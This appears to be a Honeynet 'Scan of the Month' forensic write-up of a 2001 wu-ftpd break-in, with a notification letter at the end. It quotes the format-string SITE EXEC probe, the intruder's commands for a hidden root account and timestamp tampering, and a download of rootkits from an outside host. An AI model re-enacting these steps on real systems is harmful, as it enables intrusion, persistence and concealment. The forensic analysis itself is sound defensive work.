Introduction

This is the analysis of Scan of the month -October.

Essential tools used are
All time information given here is GMT+8.

Answers to Challenge

* Which vulnerability did the intruder exploit?

The hacker exploited a vulnerability in wu-ftpd.  It is described below:

Name: CVE-2000-0573
Description The reply function in wu-ftpd 2.6.0 and earlier does not properly cleanse an untrusted format string, which allows remote attackers to execute arbitrary commands via the SITE EXEC command.

This is determined from 2 factors
  1.  The FTP server version is "wu-2.6.0(1)"
  2.  The many SITE EXEC attempts which resulted in root shell.

The decode of the start of attack is shown below:

        220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
        USER ftp
        331 Guest login ok, send your complete e-mail address as password.
        PASS mozilla@
        230 Guest login ok, access restrictions apply.
        SITE EXEC %020d|%.f%.f|
        200-00000000000000000049|0-2|
        200  (end of '%020d|%.f%.f|')
        SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.
        f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|

Intruder used source IP address 207.35.251.172 for exploit.

* What ways, and in what order, did the intruder use to connect and run commands on the system?

This can be determined in 2 ways, using the snort log and the syslog to cross check.

1] At 2001-09-17 07:52:51
Inruder telnet from IP address 217.156.93.166. Tried to login as userid:nobody password:ultravirus. Tried to login again as userid:nobody password:virus.
Finally tried to login as userid:uucp but connection finally timed out.

2] At 2001-09-17 07:55:45
Intruder ftp from IP address 207.35.251.172 which resulted in the intruder exploiting the wu-ftpd vulnerability to own the system.
After owning the system, the following commands were issued through FTP
        id;
        w
        dir
        cd /usr
        ls
        cd local
        dir
        cd bin
        dir
        cd etc
        ls --color
        cd ..
        cd etc
        ls--color
        ls
        dir
        pwd
        cd ..
        cd doc
        dir
        cd /tmp
        dir
        cd /
        dir
        cd dev
        dir
        dir
        cd /etc/X11/applnk
        ls
        cd internet
        cd Internet
        ls
        pwd
        passwd nobody -d

08:13:27 Upon changing the password of "nobody", the intruder telnet into the system
using userid:nobody to verify that access is available. After executing "w"
to check, the intruder logged out.
The intruder continued with current FTP connection and issue the following
commands:
        cd /
        mkdir -p /etc/X11/applnk/Internet/.etc
        mkdir -p /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc /etc/X11/applnk/Internet/.etc
        passwd nobody -d
        /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
        passwd dns -d
        touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
        touch -acmr /etc/X11/applnk/Internet/.etc /etc
        ls
        ls -d
        ls -s
        ls -a
        ls -n
        ls -lt
        cd etc
        ls -lt
        cat passwd-

08:32:10 Intruder telnet into the system again using "nobody", then
issued the following commands:

        su dns
        w
        cd /tmp
        mc -s
        cd /dev/rd
        ftp teleport.go.ro  [after which exited]
        mkdir sdc0
        cd sdc0
        ls
        ftp teleport.go.ro

08:41:34 During the ftp session to teleport.go.ro,
the following commands were used:
        USER teleport
        PASS gunoierul
        SYST
        CWD new
        TYPE I
        PORT 192,168,1,102,4,2
        RETR Zer0.tar.gz
        PORT 192,168,1,102,4,3
        RETR copy.tar.gz
        PORT 192,168,1,102,4,4
        RETR ooty.tar.gz
        QUIT

08:43:05 After retrieving the root kits, the intruder continues with:

        tar zxvf Zer0.tar.gz
        cd Zer0/
        ls
        ./Go 24

During the execution of "Go", the intruder attempted what seem like port scans.

08:51:58 The intruder continue with the following commands in a SSH session (the following is based on the syslog information)
        w
        whoami
        cd /dev/rd/sdc0
        ls
        rm Zer0.tar.gz
        ls
        alias ls='ls --color'
        ls
        ls
        passwd nobody
        ping www.yahoo.com
        pico /etc/rc.d/rc3.d/S50inet
        ls
        mv copy.tar.gz /usr/X11R6/bin/.,/copy/
        cd /usr/X11R6/bin/.,/copy/
        mv copy.tar.gz ../
        ls
        cd ..
        tar zxvf copy tar.gz
        chmod 7777 *
        ls
        rm copy.tar.gz
        cd copy
        chmod 7777 *
        ls

* How did the intruder try to hide his edits from the MAC times?


The commands used to hide his edits from the MAC times as described previously are (comments in Blue italic):

        First create objects for storing MAC time
        mkdir -p /etc/X11/applnk/Internet/.etc
        mkdir -p /etc/X11/applnk/Internet/.etcpasswd

        Use the touch command to transfer the original MAC time to the new object
        touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
        touch -acmr /etc /etc/X11/applnk/Internet/.etc

        The intruder does his stuff
        passwd nobody -d
        /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
        passwd dns -d

        Finally use the touch command to restore the original MAC time
        touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
        touch -acmr /etc/X11/applnk/Internet/.etc /etc

* The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

The 3 rootkits downloaded are Zer0, copy and ooty.
The package listing are shown below:

tar tvfz zero.tar.gz
drwxrwxr-x george/george     0 2001-09-14 08:00:54 Zer0/
-rwxr-xr-x george/george  9458 2001-09-17 08:26:34 Zer0/Go
-rw-r--r-- george/george 100569 2001-09-10 04:38:11 Zer0/ssh.tgz
-rw-rw-r-- george/george  11364 2001-09-10 17:01:02 Zer0/tls.tgz
-rw-r--r-- george/george  11970 2001-09-13 07:10:57 Zer0/adr.tgz
-rw-r--r-- george/george  11723 2001-09-10 04:43:17 Zer0/adr2.tgz
-rw-r--r-- george/george   2333 2001-09-17 08:27:45 Zer0/adore.h


tar tvfz copy.tar.gz
drwxr-xr-x virus/virus       0 2001-08-20 20:35:32 copy/
-rwxrwxrwx virus/virus    8268 2001-03-25 04:31:07 copy/mj2
-rwxrwxr-x virus/virus    8268 2001-05-29 01:40:00 copy/mj3
-rwxr-xr-x virus/virus  652030 1999-09-09 20:50:09 copy/ssh
drwxrwxr-x virus/virus       0 2001-09-05 21:05:39 copy/smrf/
-rwxr-xr-x virus/virus   22846 2001-06-16 20:44:00 copy/smrf/smrf5
-rw-r--r-- virus/virus    1470 2001-09-05 21:04:04 copy/smrf/smurf.ips
-rwxrwxr-- virus/virus     128 2001-08-18 15:37:28 copy/root_them
-rwxrwxr-- virus/virus   12166 2001-06-22 01:25:00 copy/process_list
-rwxrwxrwx virus/virus   12847 2001-02-16 20:07:00 copy/generate
-rwxrwxr-x virus/virus   27682 2001-08-18 15:38:43 copy/suu.tgz
-rwxrwxr-x virus/virus   14365 2001-08-14 10:34:56 copy/genmass
-rwxr-xr-x virus/virus  100158 2001-06-22 09:19:00 copy/zxploit
-rwxrwxrwx virus/virus   15121 2001-01-19 21:09:21 copy/wu-scan

tar tvfz ooty.tar.gz
drwxrwxr-x virus/virus       0 2001-09-04 11:06:12 ooty/
-rw-rw-r-- virus/virus     438 2001-06-28 13:16:50 ooty/CrOn
-rw-r--r-- virus/virus    6100 2001-05-30 08:14:17 ooty/motd
-rwxrwxr-x virus/virus   11894 2001-06-28 13:18:21 ooty/sush
-rwxr-xr-x virus/virus     460 2001-05-30 08:14:17 ooty/bindpar.x
-rw-rw-r-- virus/virus      81 2001-06-28 13:18:19 ooty/bighole.c
-rwxr-xr-x virus/virus      58 2001-06-28 13:18:19 ooty/flare
crw--w---- virus/tty     136,2 2001-09-04 11:06:44 ooty/none ~!bighole
-rwxr-xr-x virus/virus   13548 2001-05-30 08:14:17 ooty/crontab.x
-rwxr-xr-x virus/virus    1791 2001-05-30 08:14:17 ooty/mail.x
-rwxr-xr-x virus/virus    2141 2001-05-30 08:14:17 ooty/perl.x
-rwxr-xr-x virus/virus    1332 2001-05-30 08:14:17 ooty/prlnx.sh
-rwxrwxr-x virus/virus   12025 2001-06-28 13:18:20 ooty/bighole
-rwxr-xr-x virus/virus   14428 2001-05-30 08:14:17 ooty/kernel.x


From the evidence of the package contents alone, there are certain amount
of customisation as some of the files are rather recently created.
The adore rootkit is a rather well known one.

* Recover (tell how you did it too) the rootkits from the snort binary capture

By using Ethereal, load the snort capture.
For each FTP transfer, choose any FTP-DATA packet you want and click 'Follow TCP stream'.
Then save the TCP stream in Hex dump format to a file.
vi the file and do ':%s/^........//' to do a global substitution to remove the first 8 characters of counters.
Pipe the file to a perl script converter that saves as a binary file (Eg. 'cat filename | ./convert.pl').
The perl script converter convert.pl is shown below:

        #!/usr/bin/perl

        open (output, ">rk.tar.gz");

        while (<>)
        {
        $_=~s/\W//g;
        print output pack("H*",$_);
        }
        close(output);

In this case the output file 'rk.tar.gz' is the rootkit.

* What does the rootkit do to hide the presence of the attacker on the system?

By analysing the "Go" script, it does the following to hide the intruder
1] kill the syslogd daemon
2] checks for remote logging of syslog and warn the attacker
3] Installs the 'adore' LKM rootkit that basically does all the hiding.
4] It also uses the 'touch' command as described previously.

* What did you learn from this exercise?

It is interesting to note that the intruder attacks from 2 different IP addresses.
Also by doing 'strings' on the zxploit program in the 'copy' rootkit, it is a SITE EXEC exploit using the "mozilla@" FTP password . Hence, most likely the intruder used the zxploit program to hack into this system.

* How long did this challenge take you?

About 1 hour to determine the exploit used.
About 3 hours to check for tools, but in the end wrote my own script to extract the rootkits.
About 3 hours to trace the sequence of events.

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.


There are two systems that were used to attack. The source owners are determined by using whois as shown below:

whois "217.156.93.166"@whois.ripe.net
[whois.ripe.net]
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum:      217.156.93.0 - 217.156.93.255
netname:      MIDO-IMPEX
descr:        S.C. MIDO IMPEX S.R.L.
descr:        9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA
country:      RO
admin-c:      RD5445-RIPE
tech-c:       RD5445-RIPE
status:       ASSIGNED PA
mnt-by:       AS3233-MNT
notify:       domain-admin@listserv.rnc.ro
changed:      cristih@rnc.ro 20010515
source:       RIPE

person:       ROMULUS DOGARU
address:      9 C 5 MARASESTI ST
address:      5500, BACAU
address:      ROMANIA
phone:        +40-34-171060
fax-no:       +40-34-171080
e-mail:       romi@mido.ro
nic-hdl:      RD5445-RIPE
notify:       domain-admin@listserv.rnc.ro
mnt-by:       AS3233-MNT
changed:      cristih@rnc.ro 20001124
source:       RIPE

whois "207.35.251.172"@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA) GRICS01
                                                   207.35.0.0 - 207.35.255.255
B-Line Technical Services (NETBLK-B-LINE-CA) B-LINE-CA
                                               207.35.251.160 - 207.35.251.191

whois GRICS01@whois.arin.net
[whois.arin.net]
GRICS - Canadian School Project (NETBLK-GRICS-CA)
   265 de la Couronne
   Quebec City, Quebec J2S 1H9
   CA

   Netname: GRICS01
   Netblock: 207.35.0.0 - 207.35.255.255
   Maintainer: LINX

   Coordinator:
      Daoust, Philippe  (PD135-ARIN)  noc@in.bell.ca
      1-800-450-7771 +1 (416) 215-5423

   Domain System inverse mapping provided by:

   NS1.BELLGLOBAL.COM           198.235.216.1
   NS2.BELLGLOBAL.COM           198.235.216.2

   ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

   Record last updated on 26-May-2000.
   Database last updated on 2-Oct-2001 23:19:58 EDT.


The following is a sample notification letter -

Dear owner,

recently our machine was compromised and after analysis of our logs, we have clear and persistence evidence that
your machine was used to gain unauthorised entry to our machine. If you require the help of your local authorities
to followup, please disconnect your machine from the network immediately.

Attached is a partial packet capture of the intrusion:
(Time given is 2001-09-17 GMT+8)
217.156.93.166
207.35.251.172